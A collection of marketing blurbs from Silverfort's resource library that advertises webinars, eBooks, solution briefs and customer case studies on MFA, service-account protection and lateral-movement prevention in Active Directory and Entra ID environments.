- Why service accounts are so difficult to protect.
- Which approaches currently exist to mitigate this risk and their limitations.
- How to automatically discover, monitor and protect every service account against malicious access.

---
- Published: 2023-11-21
- Modified: 2024-10-22
- URL: https://www.silverfort.com/resources/exploring-the-critical-blind-spots-of-privileged-access-service-accounts-mfa-in-active-directory/

Privileged access is at the top of the list in every organization’s cybersecurity discussions. With threat actors focusing on credentials to enable initial access and lateral movement, it’s critical that every organization figure out ways to protect accounts with elevated privileges. Most have appropriately turned to Multi-Factor Authentication as the means by which to secure accounts, but there is a blind spot that exists in this strategy where privileges are ample – service accounts.
If we’re honest with ourselves, we all know that service accounts – those accounts we’ve all granted some of the highest levels of privileges to – are the least protected when it comes to ensuring they aren’t misused. Passwords are rarely changed, MFA isn’t possible, and yet these accounts have administrative access to entire subsets of your environment. This scenario creates a quandary that needs to be solved. Exactly how much risk is created by privileged service accounts with no MFA in place? And how can you put controls in place to ensure that these accounts aren’t being misused by threat actors?

In this webinar, 4-time Microsoft MVP Nick Cavalancia discusses:
- The risk of privileged service account access
- Current attack paths
- Why MFA can’t be used on service accounts
- What MITRE says about these kinds of attacks

In addition, Yiftach Keshet, Director of Product Marketing at Silverfort, discusses what the service account attack surface is and how service accounts have been incorporated in recent high-profile attacks. Topics covered include:
- What makes service accounts hard to track, monitor, and protect?
- What are the built-in gaps in MFA coverage in an AD environment that make it vulnerable to lateral movement?
- How do the MFA and service account gaps mount up together to form an exposed and intensively targeted attack surface?

---
- Published: 2023-11-20
- Modified: 2025-07-21
- URL: https://www.silverfort.com/resources/securing-networking-devices-with-silverfort/

Routers, switches, and firewalls are the backbone of your infrastructure—and the perfect target for attackers. So why leave them out of your MFA strategy? This PDF shows how Silverfort makes it simple to apply strong MFA protection to all your networking devices through RADIUS authentication.
Whether you already have a RADIUS server or you don’t, Silverfort supports both scenarios—giving you full visibility into every access request and the ability to enforce flexible MFA policies using tokens, mobile prompts, or FIDO2 devices. Silverfort strengthens authentication at the device level by applying access policies that respond to real-world risks. And since networking devices are often overlooked yet highly vulnerable, this added layer of protection can stop attackers from moving laterally, hijacking sessions, or disrupting infrastructure.

In this PDF, you’ll learn how to:
- Apply MFA to networking gear like routers, switches, and firewalls—even without modifying them.
- Use RADIUS-based authentication to enforce secure, centralized access control for infrastructure devices.
- Simplify deployment and policy enforcement across your environment using your existing identity providers.

Download the PDF now to see how Silverfort helps you close a major security gap—before attackers exploit it.

---
- Published: 2023-11-17
- Modified: 2025-02-22
- URL: https://www.silverfort.com/resources/nec-xon-customer-case-study/

Gaining Full Visibility into Authentications and Lateral Movement Prevention

NEC XON Systems is a leading African integrator of ICT solutions and part of NEC, a global Japanese firm. As a company that places a high priority on cyber security, NEC XON sought a solution that could give them full visibility into user authentication flows, protect their homegrown apps, and prevent lateral movement attacks. Since deploying Silverfort, they have solved their identity security challenges and have even become a dedicated partner, eager to share Silverfort’s enhanced security benefits with their own clients.
In this case study you’ll learn:
- How NEC XON gained real-time visibility into all access-related activity
- How they extended MFA protection to homegrown apps in a matter of weeks
- How they prevent lateral movement attacks with block-only access policies
- Why they have chosen to partner with Silverfort

---
- Published: 2023-11-16
- Modified: 2024-09-06
- URL: https://www.silverfort.com/resources/solving-identity-protection-gaps-in-telecom-environments/

The telecom industry keeps the world connected. Whether it is private communications or business interactions, it is an integral component of our daily lives, and we take many elements for granted. With the development of technology, the threat landscape of the telecom industry has also changed, causing a surge in cyber-attacks specifically targeting the industry in recent years.

Download this eBook to learn:
- The different identity protection challenges that telecoms face
- Why traditional MFA and other common solutions fail to deliver the required protection
- How Silverfort can empower you with end-to-end identity protection across your environments

---
- Published: 2023-11-16
- Modified: 2025-05-22
- URL: https://www.silverfort.com/resources/how-silverfort-solves-telecom-identity-protection-challenges/

Keeping the world connected is the responsibility of the telecom industry. With the development of technology, the threat landscape of the telecom industry has also changed. This has caused a surge in cyber-attacks specifically targeting this space in recent years. Considering it underpins most of the global critical infrastructure, a successful attack would have a significant and extensive impact.
Download this solution brief to learn:
- The different identity security risks that the telecom industry faces
- Why traditional MFA and other common solutions do not provide the level of protection required
- How Silverfort can empower you with end-to-end identity protection across your environments

---
- Published: 2023-11-09
- Modified: 2025-07-01
- URL: https://www.silverfort.com/resources/silverfort-and-microsoft-defender-for-identity/

Stop identity-based attacks in real time—across all systems—with Silverfort and Microsoft Defender for Identity (MDI).

Identity threats don’t stop at cloud boundaries. Your defenses shouldn’t either. This solution brief reveals how the powerful integration between Silverfort and Microsoft Defender for Identity (MDI) brings unmatched real-time detection and prevention of identity threats across your hybrid environment. Together, they not only detect malicious activity like “Pass the Hash” attacks, but block it instantly, even in systems where MFA or modern authentication isn't available. You’ll learn how Silverfort automatically enforces Conditional Access policies across your entire infrastructure—cloud, on-prem, and everything in between—without disrupting users. The result? Fewer false positives, stronger protection, better outcomes. If you rely on MDI for threat detection, this guide shows how Silverfort turns that visibility into action.

In this PDF, you’ll learn how to:
- Extend Entra ID Conditional Access to legacy on-prem resources like file shares, servers, and command-line tools.
- Block lateral movement and account takeover instantly, before attackers can escalate.
- Enhance zero trust with granular, real-time policy enforcement based on actual user risk.

Download the PDF to see how Silverfort and Microsoft work better together, so you can respond to threats without missing a beat.
---
- Published: 2023-10-31
- Modified: 2024-10-22
- URL: https://www.silverfort.com/resources/analysis-of-the-key-weaknesses-and-exposures-in-the-identity-attack-surface-silverfort/

If you’ve been paying attention to cyberattack actions, you already know that privileges are the key to an attacker’s success. But it’s not the privileges where your risk truly lies; it’s in the security revolving around identity. If you have an admin with a password of ‘password’, it wasn’t the elevated privileges that did your organization in – it was the credential identity that provided the threat actor with said elevated privileges. And why was it so easy for an elevated identity to be compromised? Weaknesses in your identity configuration, management, and monitoring are likely the cause.

In this webinar, Silverfort’s VP of Product Marketing, Yiftach Keshet, joins 4-time Microsoft MVP Nick Cavalancia to discuss why identity is your most important attack surface, using the MITRE ATT&CK Framework to demonstrate how nearly every action taken inevitably traces back to a weak identity attack surface. Other topics covered include:
- Common identity security gaps that exist in most environments that may be missed by most security practitioners.
- The root cause of these gaps and how they are being exploited.
- How to detect and mitigate identity weaknesses through security controls like MFA and identity segmentation.
- And more.

---
- Published: 2023-10-12
- Modified: 2025-07-21
- URL: https://www.silverfort.com/resources/silverfort-and-yubico/

What if your YubiKeys could protect not just web apps—but every legacy system, database, and command-line tool too? With the Silverfort + Yubico integration, they can. This PDF breaks down how the two platforms work together to deliver hardware-backed, risk-based authentication across your entire IT environment—on-prem and in the cloud.
Until now, extending YubiKey MFA to systems like PowerShell, PsExec, RDP, or legacy infrastructure meant costly workarounds or accepting risk. But Silverfort changes that. It analyzes every access request in real time, and when risk is detected, prompts Yubico’s FIDO2-based authentication—no code changes, no compromise. Whether you’re aiming to strengthen Zero Trust, reduce attack surface, or meet compliance requirements, this integration brings passwordless, phishing-resistant protection to the places it’s needed most.

In this PDF, you’ll learn how to:
- Extend YubiKey MFA to legacy, cloud, and on-prem systems that couldn’t be protected before.
- Trigger authentication based on real-time risk to avoid MFA fatigue while maximizing security.
- Deliver a consistent MFA experience across all user access points—without friction or disruption.

Download the PDF now and discover how Silverfort and Yubico combine for enterprise-wide, zero-compromise identity protection.

---
- Published: 2023-10-02
- Modified: 2025-02-22
- URL: https://www.silverfort.com/resources/silverfort-and-kayak-a-case-study/

In this testimonial, Kayak’s Tom Parker, VP of IT & CISO, and Austin Michaels, Security Engineer, explain how Silverfort enabled them to extend MFA to on-prem apps and command-line access as well as put real-time protection on service accounts.

https://www.youtube.com/watch?v=Af74J6Rmii8

---
- Published: 2023-09-28
- Modified: 2024-09-06
- URL: https://www.silverfort.com/resources/addressing-telecommunication-security-framework-requirements-for-privileged-accounts/

This whitepaper specifies how organisations can use the Silverfort Unified Identity Protection platform to implement the identity protection aspect of the Telecommunication Security Framework.

Download this whitepaper to learn:
- What is the Telecommunication Security Framework (TSF)?
- What parts of TSF does Silverfort address?
- What protection do mitigations provide?
---
- Published: 2023-09-27
- Modified: 2025-02-22
- URL: https://www.silverfort.com/resources/silverfort-and-huntsville-hospital-a-case-study-2/

In this testimonial, Huntsville Hospital’s Rick Corn, CIO, and Ryan Petraszewsky, IT Security Officer, discuss how Silverfort helped them to implement real-time protection against identity-based attacks on all critical healthcare operations, including service accounts and applying MFA to all privileged users.

https://www.youtube.com/watch?v=amxnV7C6B9s

---
- Published: 2023-09-26
- Modified: 2025-07-21
- URL: https://www.silverfort.com/resources/silverfort-bridging-to-entra-id/

What if your legacy apps and on-prem tools could follow the same security policies as your cloud apps? That’s exactly what Silverfort’s Entra ID bridging makes possible. This PDF shows how Silverfort enables organizations to bring modern identity protections—like Conditional Access and MFA—to every system in the enterprise, including those that were never designed for them. Silverfort bridges authentications from Active Directory into Entra ID, automatically representing on-prem resources as SaaS-like enterprise app objects. Once bridged, Entra ID can apply centralized policies, monitor authentication activity, and protect access in real time—just like with any cloud-native app. With no code changes or user disruption, organizations get full visibility and unified control across their hybrid environments—while reducing the risk of identity-based attacks like lateral movement.

In this PDF, you’ll learn how to:
- Bridge on-prem authentication flows into Entra ID, extending modern policy enforcement to legacy resources.
- Enforce Conditional Access and MFA on systems like command-line tools, servers, and databases.
- Gain consistent control and visibility across hybrid identity infrastructure—cloud and on-prem alike.

Download the PDF to see how Silverfort makes Entra ID the policy engine for all your resources—not just the ones born in the cloud.
---

- Published: 2023-09-26
- Modified: 2024-09-06
- URL: https://www.silverfort.com/resources/nhs-england-mfa-policy-compliance-with-silverfort/

NHS organisations and contractors are being encouraged to implement multi-factor authentication (MFA) controls for all privileged users and services accessing critical systems. UK NHS organisations are required to make every reasonable effort to comply as soon as possible. Learn how Silverfort can enable NHS organisations to deploy MFA protection to all users and resources across their environments.

Download this PDF to learn how to:

- Simply deploy MFA protection to all environments and resources, in the cloud or on-prem, without the need for agents or proxies.
- Identify and mitigate identity-based attacks across your hybrid environment.
- Provide users with a consistent and familiar experience when accessing any resource, both on-prem and in the cloud.

---

- Published: 2023-09-25
- Modified: 2024-10-22
- URL: https://www.silverfort.com/resources/osterman-research-silverfort-the-state-of-the-identity-attack-surface/

Today, organizations depend on digital assets for business, but identity threats pose a critical risk. Attackers persistently target user identities, revealing serious gaps in organizations’ protective tools. Silverfort commissioned an extensive study from Osterman Research to dig into the full extent of these security gaps, which are detailed in our new report, "The State of the Identity Attack Surface: Insights into Critical Protection Gaps."

In this webinar, Silverfort CEO & Co-Founder Hed Kovetz joins Michael Sampson, Principal Analyst at Osterman Research, for a detailed review of the key findings from this report and explores the various ways organizations remain dangerously exposed to attacks involving compromised credentials.
Watch this webinar to discover:

- What the Identity Attack Surface is and why it must be protected
- The degree to which organizations have achieved multi-factor authentication (MFA), privileged access management (PAM), and service account protection
- Which solutions can fully protect the Identity Attack Surface
- And much more...

---

- Published: 2023-09-20
- Modified: 2024-10-22
- URL: https://www.silverfort.com/resources/identity-zero-trust-from-vision-to-practical-implementation/

Since its emergence, zero-trust has been commonly associated with rebuilding networking infrastructure security. Silverfort challenges this approach and enables organizations to implement an end-to-end zero-trust architecture at the identity control plane by monitoring and enforcing active access policies on any user, system and environment, both on-premises and in the cloud. In this webinar, we present an actionable framework for identity zero-trust implementation and illustrate its effectiveness by analyzing prominent examples from the recent cybersecurity threat landscape.

Gain insight into a number of different topics, including:

- The role of identity in zero-trust security
- The benefits of having unified IAM visibility and control for the implementation of zero-trust security
- The importance of risk analysis and adaptive policies in zero-trust security
- And more

---

- Published: 2023-09-19
- Modified: 2025-07-21
- URL: https://www.silverfort.com/resources/silverfort-for-entra-id-sign-in-logs/

You already have the sign-in data. Silverfort helps you unlock its full security potential. This PDF details how Silverfort’s native integration with Microsoft Entra ID brings unified visibility, risk analysis, and proactive protection to every sign-in—across cloud, on-prem, and hybrid environments. By analyzing Entra ID sign-in logs alongside on-prem Active Directory data, Silverfort gives security teams a single, cohesive view of identity activity across the entire organization.
Silverfort enriches every authentication event with real-time context, risk scoring, and threat indicators like lateral movement, Pass the Hash, and Kerberoasting. It doesn’t just centralize data—it turns it into an actionable layer of your identity security strategy. Whether you’re streamlining investigations or enforcing more precise access policies, this integration gives you the clarity and control you've been missing.

In this PDF, you’ll learn how to:

- Correlate identity data from Entra ID and AD to detect hidden threats and anomalies in real time.
- Accelerate investigations with enriched forensic data on users, machines, apps, and protocols.
- Gain a consistent logging experience with full identity context—delivered in a single console.

Download the PDF now to see how Silverfort transforms Entra ID sign-in data into a powerful force for enterprise security.

---

- Published: 2023-09-19
- Modified: 2024-10-22
- URL: https://www.silverfort.com/resources/way-too-vulnerable-uncovering-the-state-of-the-identity-attack-surface-silverfort/

Organizations today rely on digital assets to conduct business, but identity threats have become a critical risk factor. As attackers relentlessly seek to compromise user identities for malicious access, it’s become increasingly apparent there are serious gaps in the tools organizations use to protect themselves. Silverfort commissioned an extensive study from Osterman Research, a leading cybersecurity consulting firm, which has revealed the full extent of these security gaps.

In this webinar, our CEO & Co-Founder, Hed Kovetz, examines the state of the Identity Attack Surface and explores the various ways organizations remain dangerously exposed to attacks involving compromised credentials.
Watch this webinar to explore:

- What the Identity Attack Surface is and why it must be protected
- The degree to which organizations have achieved multi-factor authentication (MFA), privileged access management (PAM), and service account protection
- Which solutions can fully protect the Identity Attack Surface
- And much more...

---

- Published: 2023-09-06
- Modified: 2024-09-06
- URL: https://www.silverfort.com/resources/unified-identity-protection/

Watch this short video about Unified Identity Protection with Silverfort. Discover Unified Identity Protection with Hed Kovetz, CEO and Co-Founder at Silverfort.

https://www.youtube.com/watch?v=Xuwip6mdB-Y

---

- Published: 2023-09-06
- Modified: 2024-10-02
- URL: https://www.silverfort.com/resources/the-state-of-the-identity-attack-surface-an-osterman-research-report/

The first comprehensive study on identity threat resilience: why organizations are unable to protect themselves against account takeovers, lateral movement, and ransomware attacks.

- 83% of organizations have experienced a security breach involving compromised credentials.
- Only 5.7% of organizations have full visibility into their service accounts.
- 89.8% of organizations fail to fully onboard their PAM solutions.
- Only 22% of organizations are able to prevent malicious access to their service accounts.

---

- Published: 2023-09-03
- Modified: 2024-09-06
- URL: https://www.silverfort.com/resources/solving-the-mfa-challenge-in-oil-gas-air-gapped-networks/

Oil and Gas companies struggle to keep their air-gapped OT networks safe from identity threats such as lateral movement and ransomware attacks.
This eBook explains:

- How third-party access, IT\OT convergence, and use of Domain Controllers increase the air-gapped network’s exposure to malicious access
- Why traditional MFA and secure remote access solutions fail to deliver the required protection
- How Silverfort secures both the IT environment and the air-gapped networks with FIDO2 hardware token MFA

---

- Published: 2023-08-31
- Modified: 2025-07-21
- URL: https://www.silverfort.com/resources/silverfort-mfa-for-air-gapped-networks/

Silverfort’s agentless authentication platform integrates directly with Okta to extend strong, adaptive multi-factor authentication (MFA) everywhere....

Air-gapped networks are designed for maximum security—but they’ve traditionally lacked one critical control: MFA. Silverfort changes that with the only MFA solution purpose-built for air-gapped environments, eliminating the need for code changes or internet connectivity. This solution brief introduces how Silverfort enables multi-factor authentication for all Active Directory authentications in fully disconnected networks without disrupting operations or compromising system integrity.

What makes it different?

- No reboots, no updates: Ideal for 24/7 critical infrastructure with zero downtime tolerance
- Protect legacy systems without code changes: Apply MFA to any authentication flow—NTLM, Kerberos, LDAP—out of the box
- FIDO2 token support: Secure authentication using any hardware token, even in isolated environments

The included diagram clearly illustrates how Silverfort integrates with AD to authenticate users, admins, non-human identities, and systems—without requiring any changes to the applications or their authentication mechanisms. If you operate OT, ICS, or highly secure air-gapped systems, this guide is your roadmap to adding robust identity protection—seamlessly.

Get the PDF now to learn how you can secure your most critical, disconnected infrastructure with the simplicity and power of universal MFA.
---

- Published: 2023-07-13
- Modified: 2025-02-22
- URL: https://www.silverfort.com/resources/maribyrnong-city-council-and-silverfort-a-case-study/

Real-Time Visibility into All Access-Related Activity

As a prominent governmental entity, the city council of Maribyrnong needed to increase its overall security posture, which meant gaining better visibility into its admin users as well as its overall IT infrastructure. Since deploying Silverfort, the Maribyrnong City Council is protecting its key admin users and core resources, a capability that wasn’t possible before.

In this case study you’ll learn:

- How Maribyrnong City Council implemented MFA protection for all users and resources in just four weeks
- How the city council of Maribyrnong gained complete visibility into the activity of all admin users
- How Maribyrnong City Council fully automated visibility and protection of service accounts

---

- Published: 2023-07-06
- Modified: 2025-05-22
- URL: https://www.silverfort.com/resources/optix-and-silverfort-a-case-study/

Renewed Cyber Insurance Policy and Prevented a Lateral Movement Attack

Optix’s cyber insurance provider tightened their requirements for Optix to renew their cyber insurance policy. Optix needed to deploy Multi-Factor Authentication (MFA) on all domain admin access requests. Once Optix implemented Silverfort across its environments, they were able to renew their cyber insurance policy shortly after. Two months after deploying Silverfort, Optix was targeted by a malicious actor who was trying to move laterally across their network. This attack was unsuccessful because Silverfort enabled Optix to identify the root cause and immediately block all access for the user whose credentials had been compromised.
In this case study you’ll learn:

- How Silverfort enabled Optix to meet their new cyber insurance requirements for MFA protection
- How Optix gained complete visibility into their service accounts
- How Silverfort’s service account capabilities detected and prevented a lateral movement attack

---

- Published: 2023-06-15
- Modified: 2025-07-21
- URL: https://www.silverfort.com/resources/identity-zero-trust-how-to-move-from-vision-to-implementation-ebook/

Learn why it makes sense to begin with an identity focus when it comes to Zero Trust and how Silverfort can help take your Zero Trust security project from vision to implementation.

Zero Trust in the identity control plane means the ability to ensure that user access to any on-prem or cloud resource is never granted unless it’s been analyzed and verified. However, while the vision is clear and intuitive, many organizations struggle with its implementation in practice.

Download this eBook to learn:

- Why the identity control plane is the natural place to begin your Zero Trust journey.
- What the four pillars are that can assist you in implementing identity Zero Trust in your environment.
- What makes Silverfort your ideal identity Zero Trust partner with continuous monitoring, risk analysis, and access policy enforcement on all users and resources.

---

- Published: 2023-06-14
- Modified: 2024-09-06
- URL: https://www.silverfort.com/resources/cyber-essentials-and-cyber-essentials-plus-certification-assessment/

This whitepaper specifies how organisations can integrate the Silverfort Unified Identity Protection platform to help comply with the Cyber Essentials and Cyber Essentials Plus certification assessment, per its latest update in April 2021.

Download this whitepaper to learn:

- What is the Cyber Essentials and Cyber Essentials Plus certification assessment?
- What parts of the Cyber Essentials and Cyber Essentials Plus does Silverfort address?
- What protection do mitigations provide?
---

- Published: 2023-06-06
- Modified: 2025-07-21
- URL: https://www.silverfort.com/resources/identity-threat-detection-and-response-itdr-protecting-the-exposed-attack-surface/

Learn how Silverfort’s Azure AD bridging capability extends Azure AD MFA and Conditional Access to all on-prem resources while configuring all access policies from Azure AD.

Identity threats that utilize compromised credentials for malicious access to targeted resources have become the chief concern for organizations’ security stakeholders. None of the existing security products can deliver real-time protection against these attacks, making account takeover, lateral movement and ransomware spread a critical, unaddressed risk. Identity Threat Detection and Response (ITDR) is the new category of products that was purpose-built to confront and win against these attacks.

Download this eBook to learn:

- What makes the identity attack surface exposed to attacks?
- What are the core capabilities of an ITDR solution?
- How to choose an ITDR solution that best fits your needs?

---

- Published: 2023-06-06
- Modified: 2024-11-04
- URL: https://www.silverfort.com/resources/solving-the-top-five-pam-challenges-of-identity-teams/

PAM solutions aim to address the challenge of protecting privileged accounts – both admin users and service accounts – from compromise. However, there are critical admin user discovery and protection challenges that must be overcome to successfully complete the PAM onboarding journey.

Download this eBook to learn:

- Why only protecting the admins you know about leaves critical users exposed to compromise.
- What special visibility and protection challenges service accounts introduce to PAM solutions.
- How a Unified Identity Security platform can accelerate the PAM journey and complement its blind spots.
---

- Published: 2023-05-23
- Modified: 2025-08-21
- URL: https://www.silverfort.com/resources/bridging-legacy-resources-from-ad-to-azure-ad-ebook/

Learn how Silverfort’s Azure AD bridging capability extends Azure AD MFA and Conditional Access to all on-prem resources while configuring all access policies from Azure AD.

Modern enterprise IT environments are highly diverse and include many different resources, from legacy IT infrastructure to SaaS and web applications. This has required enterprises to deploy multiple IAM solutions such as Entra ID to manage their on-prem and cloud environments. While Entra ID protects cloud, SaaS, and web apps with Conditional Access and Entra ID MFA, the authentication protocols of on-prem enterprise resources do not natively support Entra ID. This creates a critical identity protection gap that has not been addressed – until today.

Download this eBook to learn:

- What are the security gaps in hybrid environments?
- How Silverfort enables organizations to overcome the hybrid environment security gaps
- How Silverfort’s Entra ID bridging extends Entra ID MFA and Conditional Access to all on-prem resources while configuring all access policies from Azure AD.

---

- Published: 2023-05-23
- Modified: 2024-10-22
- URL: https://www.silverfort.com/resources/real-time-mfa-and-service-account-protection-can-defeat-ransomware-attacks/

Lateral movement is the X factor that transforms ransomware attacks from a mere nuisance to an enterprise-level incident. While once found only in high-end APT-style operations, today lateral movement skills and techniques have been commoditized and are incorporated into over 80% of ransomware attacks. Why are these attacks still succeeding so widely despite increasing investments in cybersecurity controls? The answer lies in the inherent blind spots found in practically every security stack, and the inability of endpoint and network security products to prevent malicious authentications in real time.
In this webinar, Silverfort’s VP of Product Marketing, Yiftach Keshet, joins CISO James Azar for a discussion around topics including:

- How lateral movement has gradually become the most critical risk your environment faces.
- How the blind spots in MFA and service account protection allow attackers to move in our environments under the radar.
- What makes identity-focused protection the only way to defeat lateral movement and ransomware spread?
- And more

---

- Published: 2023-05-22
- Modified: 2024-09-06
- URL: https://www.silverfort.com/resources/silverfort-for-microsoft-365-e5/

Whether already fully deployed with multiple Microsoft 365 E5 security products or just starting, Silverfort provides unified identity protection across on-prem, cloud, and edge environments, by extending and enhancing your investment in Microsoft 365 E5 to resources and interfaces that couldn’t be protected before, such as legacy applications, on-prem servers, and more.

Download this PDF to learn how:

- Silverfort helps organizations to consolidate their IAM and extend identity protection across hybrid environments
- Silverfort empowers Microsoft 365 E5 products
- Silverfort and Microsoft have joined forces to deliver unmatched real-time detection and prevention of identity threats in a unified manner

---

- Published: 2023-05-10
- Modified: 2025-02-22
- URL: https://www.silverfort.com/resources/starco-and-silverfort-a-case-study/

Extending MFA Protection to All Users and Resources

Understanding the security risks of identity-based attack methods that are commonly used when targeting admin users and RDP access, STARCO recognized they needed an identity protection solution that would be the answer to their identity security needs.
With Silverfort, they deployed MFA protection for admin users and RDP, and along the way, they implemented Silverfort’s service account discovery and protection capabilities across their environments.

In this case study you’ll learn:

- How MFA protection was deployed across all users and resources in just a few hours
- How all admin and privileged users of STARCO are protected with MFA policies
- How STARCO fully automated visibility and protection of service accounts

---

- Published: 2023-05-07
- Modified: 2024-09-26
- URL: https://www.silverfort.com/resources/reevaluate-your-mfa-protection-ebook-ug/

MFA protection is ultimately only as strong as its weakest link. Without an MFA deployment that covers all organizational resources, these weak links will persist, potentially exposing your organization to risk.

Download this eBook to learn:

- What are the security gaps in traditional MFA solutions?
- How can you assess your existing MFA protection to better understand your risk exposure?
- How can you gain end-to-end MFA coverage for all your cloud and on-prem resources?

---

- Published: 2023-04-13
- Modified: 2025-02-22
- URL: https://www.silverfort.com/resources/major-multinational-bank-extends-custom-mfa-to-legacy-applications/

Extending MFA Protection to Legacy Applications

This case study examines an important issue faced by many financial institutions: how to protect crucial legacy applications with modern security controls without undertaking any code changes or incurring any downtime. With Silverfort, a major multinational bank was able to seamlessly extend its custom MFA solution to hundreds of legacy apps.
In this case study you’ll learn:

- How legacy apps can be protected with MFA without code changes
- How this same protection can be extended to additional parts of the IT and security infrastructure
- How an MFA policy can be created to allow access to a suite of apps with just a single verification

---

- Published: 2023-03-30
- Modified: 2025-04-10
- URL: https://www.silverfort.com/resources/silverfort-service-accounts-solution-brief/

Silverfort automates the discovery, access control and protection of all service accounts in the environment, providing organizations with granular visibility into every non-human identity and machine-to-machine authentication.

Download this Solution Brief to learn:

- How Silverfort discovers all of your service accounts.
- How Silverfort continuously monitors your service accounts’ access activity and provides a risk scoring for each access attempt.
- How Silverfort automatically suggests a tailor-made policy for each service account based on its behavioral pattern.

---

- Published: 2023-03-30
- Modified: 2024-09-06
- URL: https://www.silverfort.com/resources/securing-manufacturing-environments-with-mfa/

In this e-book you’ll learn the core components of lateral movement attacks and understand why they are a blind spot for today’s endpoint, network, and PAM products.

Manufacturers are continuously targeted by cyber-attacks that increase in volume and sophistication, with a potentially harsh impact on their operations. Specifically, the steep rise in identity threats that utilize compromised credentials for malicious resource access has become a top concern for manufacturers’ security teams that strive to keep their applications and systems secure.

Download this eBook to learn:

- What are the different key identity protection challenges manufacturers experience.
- About the importance of protecting manufacturing environments with MFA.
- How you can gain end-to-end MFA coverage across your entire production environments.
---

- Published: 2023-03-29
- Modified: 2025-07-21
- URL: https://www.silverfort.com/resources/solving-the-lateral-movement-protection-blind-spot-with-identity-threat-detection-and-response-itdr/

In this e-book you’ll learn the core components of lateral movement attacks and understand why they are a blind spot for today’s endpoint, network, and PAM products.

Lateral movement is one of the most critical parts of a cyberattack, and is often the stage in which a local event escalates into an organizational incident. Yet so far, the existing products within the identity and security stacks have failed to efficiently protect against this type of malicious activity.

Download this eBook to learn:

- How lateral movement employs compromised credentials to spread in a targeted network.
- What are the inherent blind spots that enable adversaries to launch lateral movement attacks without encountering adequate resistance.
- How the emerging Identity Threat Detection and Response (ITDR) approach mitigates lateral movement attacks by preventing them in real time.

---

- Published: 2023-02-27
- Modified: 2024-10-22
- URL: https://www.silverfort.com/resources/understanding-cyber-insurance-identity-security-requirements-for-2023/

The practice of cyber insurance has gained momentum during the last decade and is now a common necessity for organizations of all sizes and verticals. However, the recent surge in ransomware attacks - and the steep rise in their destructive impact - has made insurance underwriters realize that a radical change in the standard security posture is needed, particularly around MFA requirements and service account protection.

In this webinar, we take a deep dive into the identity protection aspects of the new cyber insurance requirements. Hear from expert Don Hoffman of Silverfort about topics including:

- What types of MFA are required for cyber liability insurance?
- How do new specific MFA controls minimize ransomware attack surfaces?
- How can you extend MFA and other modern access controls to all resources, including service accounts and others that couldn’t have been protected before?
- And more

---

- Published: 2023-02-26
- Modified: 2025-07-21
- URL: https://www.silverfort.com/resources/silverfort-microsoft-extending-azure-mfa-to-all-resources-that-couldnt-be-protected-before/

Think Entra MFA stops at the cloud? Silverfort proves it doesn’t have to. This solution brief reveals how Silverfort supercharges Microsoft’s Entra MFA, extending its protection to every resource across your organization—without code changes, agents, or disruptions. That includes legacy applications, RDP and SSH, command-line tools like PowerShell and PsExec, file shares, databases, and more. With native integration into Active Directory, Silverfort can enforce Entra MFA even for systems that never supported it.

The result? You get real-time protection from identity-based threats—everywhere—and your users only get prompted when there’s real risk. No more MFA fatigue. No more unprotected access points. This guide breaks down how it works, what makes it powerful, and why it’s the easiest way to standardize on Entra MFA across your hybrid environment.

In this PDF, you’ll learn how to:

- Apply Entra MFA to all resources, including legacy and on-prem systems that couldn’t be protected before.
- Use risk-based enforcement so users only get prompted when unusual behavior is detected.
- Deploy seamlessly with Silverfort’s agentless, proxyless architecture—no changes to apps or infrastructure.

Download the solution brief now and see how Silverfort turns Entra MFA into a truly unified, enterprise-wide security layer.

---

- Published: 2023-02-26
- Modified: 2025-07-21
- URL: https://www.silverfort.com/resources/silverfort-and-microsoft-ad-fs-integration/

Think AD FS can’t protect your legacy systems or on-prem servers with MFA? Think again.
This PDF shows how Silverfort enhances Microsoft AD FS with powerful risk-based MFA enforcement—without modifying your applications or infrastructure. Through native integration with Active Directory, Silverfort evaluates every access request in real time and pushes Azure MFA notifications only when true risk is detected.

The result? Organizations can now apply MFA across their entire environment—from legacy tools and databases to SSH, RDP, command-line access, and cloud workloads—while avoiding user fatigue and deployment headaches. Whether you’re aiming to modernize identity protection or close the gap in your zero trust strategy, this guide is a must-read.

In this PDF, you’ll learn how to:

- Apply Azure MFA protection via AD FS to resources that don’t natively support it, like legacy apps and IT infrastructure.
- Leverage advanced risk analysis to ensure MFA prompts only appear when truly needed.
- Gain unified, real-time identity protection across cloud and on-prem systems, without rewriting or reconfiguring apps.

Download the PDF now to learn how Silverfort turns AD FS into a full-spectrum identity security powerhouse.

---

- Published: 2023-02-01
- Modified: 2024-09-06
- URL: https://www.silverfort.com/resources/top-identity-protection-challenges-for-manufacturing-organizations/

It is common knowledge that manufacturing is one of the most targeted verticals and that threat actors launch data theft and ransomware operations on manufacturing companies daily. What is less commonly known is that the growing share of identity threats within the overall threat landscape collides with security weaknesses that are unique to this vertical, increasing manufacturers’ risk exposure and the potential damage these attacks can cause.
In this collateral, you’ll become familiar with the identity threats that manufacturing environments face, get to know the top challenges they face when attempting to protect against them, and learn how Silverfort’s Unified Identity Protection platform can assist identity and security teams to fully address these challenges and keep their environments secure.

---

- Published: 2023-02-01
- Modified: 2024-09-06
- URL: https://www.silverfort.com/resources/silverfort-mfa-protect-the-unprotectable/

Silverfort utilizes agentless and proxyless technology to extend MFA to any resource and access interface across the on-prem and multi-cloud enterprise environment. This includes assets that could never have been protected with MFA before, such as legacy and homegrown applications, command-line access tools, industrial and healthcare systems, file shares, databases and more.

Download this Solution Brief to learn:

- How to apply MFA protection to all resources, on-premises or in the cloud, including those that couldn’t be protected until now.
- How to extend your existing MFA solution to cover resources and use cases that weren’t natively supported.
- How Silverfort can replace any MFA solution, delivering broader protection, simpler maintenance and significant savings while addressing MFA, PAM and UEBA.

---

- Published: 2023-01-25
- Modified: 2024-09-06
- URL: https://www.silverfort.com/resources/bounce-the-ticket-and-silver-iodide-on-azure-ad-kerberos/

Azure AD Kerberos is a new modification of the legacy Kerberos protocol, developed by Microsoft to enable IaaS workloads in Azure to authenticate directly to Azure AD instead of to a legacy AD as they did until now.
However, our research disclosed that some of the critical Kerberos weaknesses are still present in the new Entra ID (formerly Azure AD). In this research you can learn how we have modified the Kerberos Pass the Ticket and Silver Ticket techniques to develop the new Bounce the Ticket and Silver Iodide that can be used against Azure AD Kerberos.

---

- Published: 2023-01-04
- Modified: 2025-02-22
- URL: https://www.silverfort.com/resources/lateral-movement-prevention-with-mfa-and-service-account-protection/

Lateral movement and ransomware propagation abuse two key blind spots in Active Directory to take down organizations' data and operations: service accounts and MFA. Silverfort's Unified Identity Security platform rises to this challenge, providing its customers with real-time detection and blocking of lateral movement attacks through its extended MFA and automated service account protection.

